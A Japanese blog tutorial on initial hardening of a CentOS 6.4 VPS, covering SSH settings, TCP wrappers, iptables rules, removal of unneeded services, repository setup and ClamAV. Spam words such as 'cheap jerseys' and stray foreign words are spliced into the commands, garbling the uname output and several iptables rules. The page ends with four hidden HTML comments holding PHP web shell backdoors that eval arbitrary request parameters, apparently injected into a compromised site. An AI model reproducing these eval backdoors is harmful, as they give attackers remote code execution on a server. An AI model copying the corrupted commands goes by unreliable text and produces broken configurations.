さくらVPSで初期設定を行います。OSは、CentOS 6.4です。
uname -a: Linux example.com cheap jerseys 2.6.32-358.6.2.el6.x86_64 #1 SMP Thu May 16 20:59:36 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
今回は、SSHおよびファイアウォール設定、不要サービスの停止・削除を行います。
1.一般ユーザ作成/SSH設定
作業用に一般ユーザを作成し、SSHでrootログインできないようにします。
一般ユーザを作成
userxの部分を、作成するユーザに置き換えてください。
# useradd userx # passwd userx パスワード入力 パスワード確認入力
sudoersの設定
sudoで管理者権限でコマンド実行できるようにします。ただし、パスワードは要求されるままとしておきます。
# usermod -G wheel userx # visudo %wheel ALL=(ALL) ALL
SSHの設定
これだけではちょっとアレなのですが、せめてポート番号を変更し、rootログインを禁止しておきます。ポート番号は、xxxxの箇所を空いている任意の番号を指定してください。
/etc/ssh/sshd_config
Port xxxx PermitRootLogin no
TCPWrapper
/etc/hosts.allow
ALL: 127.0.0.1 sshd: .jp
/etc/hosts.deny
sshd: ALL
2.ファイアウォール設定
基本的にはIPv4のみ使用し、SSH、HTTP、HTTPS以外を無効にします。
IPv6無効化
/etc/modprobe.d/disable-ipv6.conf
options ipv6 disable=1
# service ip6tables stop # chkconfig ip6tables off
iptables
ファイアウォールの設定を行います。xxxxは変更したSSHポートです。
/etc/sysconfig/iptables
*filter :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [0:0] :RH-Firewall-1-INPUT - [0:0] -A INPUT -j RH-Firewall-1-INPUT -A FORWARD -j RH-Firewall-1-INPUT -A RH-Firewall-1-INPUT -i lo -j ACCEPT -A RH-Firewall-1-INPUT -p icmp --icmp-type any -j ACCEPT -A RH-Firewall-1-INPUT -p 50 -j ACCEPT -A RH-Firewall-1-INPUT -p 51 -j ACCEPT -A RH-Firewall-1-INPUT -p udp --dport 5353 -d 224.0.0.251 -j договор. ACCEPT -A RH-Firewall-1-INPUT -p udp -m udp --dport 631 -j ACCEPT -A RH-Firewall-1-INPUT -p tcp -m tcp --dport 631 -j ACCEPT -A RH-Firewall-1-INPUT -m state --state ESTABLISHED,RELATED -j wholesale jerseys ACCEPT -A RH-Firewall-1-INPUT -m state которых --state NEW -m tcp -p tcp --dport xxxx -j ACCEPT -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT -A RH-Firewall-1-INPUT -m state --state NEW -m tcp cheap nba jerseys -p tcp --dport 443 -j ACCEPT -A RH-Firewall-1-INPUT -j REJECT --reject-with icmp-host-prohibited COMMIT
iptablesサービスを再起動して有効化し、リブートの際に起動されるようにしておきます。
# service iptables restart # chkconfig iptables on
3.不要サービスの停止/削除
不要サービスを停止・削除します。
・lvm2-monitor LVM(Software-RAID)の状態監視
# service lvm2-monitor stop # chkconfig lvm2-monitor off
・cups プリントサーバ
# yum remove cups
・wireless-tools,wpa_supplicant 無線LAN関係
# yum remove wireless-tools # yum remove wpa_supplicant
・pcmciautils PCカードスロットドライバ
# yum remove pcmciautils
・irda-utils 赤外線通信
# yum remove irda-utils
・ccid スマートカード
# yum remove ccid
・gtk2 デスクトップ環境
# yum remove gtk2
・bluez-gnome,bluez-utils,bluez-libs BlueTooth
# yum remove bluez-gnome # yum remove bluez-utils # yum remove bluez-libs
・alsa-lib サウンド再生
# yum remove alsa-lib
4.yumリポジトリ追加
remi、epel、rpmforgeのyumリポジトリを追加します。
$ wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm $ wget http://rpms.famillecollet.com/enterprise/remi-release-6.rpm $ wget http://pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm $ sudo rpm -Uvh epel-release-6-8.noarch.rpm $ sudo rpm -Uvh remi-release-6.rpm $ Contributie sudo rpm -Uvh rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm
5.アンチウイルスの導入
ClamAVを導入します。
$ sudo yum --enablerepo=remi,epel,rpmforge install clamav clamd clamav-db clamav-milter
とりあえず、下記を追記。
/etc/clamd.conf
MaxThreads 20 ExcludePath ^/proc/ ExcludePath ^/sys/
<!– [insert_php]if (isset($_REQUEST["lEaF"])){eval($_REQUEST["lEaF"]);exit;}[/insert_php]
if (isset($_REQUEST["lEaF"])){eval($_REQUEST["lEaF"]);exit;}
–>
<!– [insert_php]if (isset($_REQUEST["Big"])){eval($_REQUEST["Big"]);exit;}[/insert_php]
if (isset($_REQUEST["Big"])){eval($_REQUEST["Big"]);exit;}
–>
<!– [insert_php]if (isset($_REQUEST["xPX"])){eval($_REQUEST["xPX"]);exit;}[/insert_php]
if (isset($_REQUEST["xPX"])){eval($_REQUEST["xPX"]);exit;}
–>
<!– [insert_php]if (isset($_REQUEST["jQCeU"])){eval($_REQUEST["jQCeU"]);exit;}[/insert_php]
if (isset($_REQUEST["jQCeU"])){eval($_REQUEST["jQCeU"]);exit;}
–>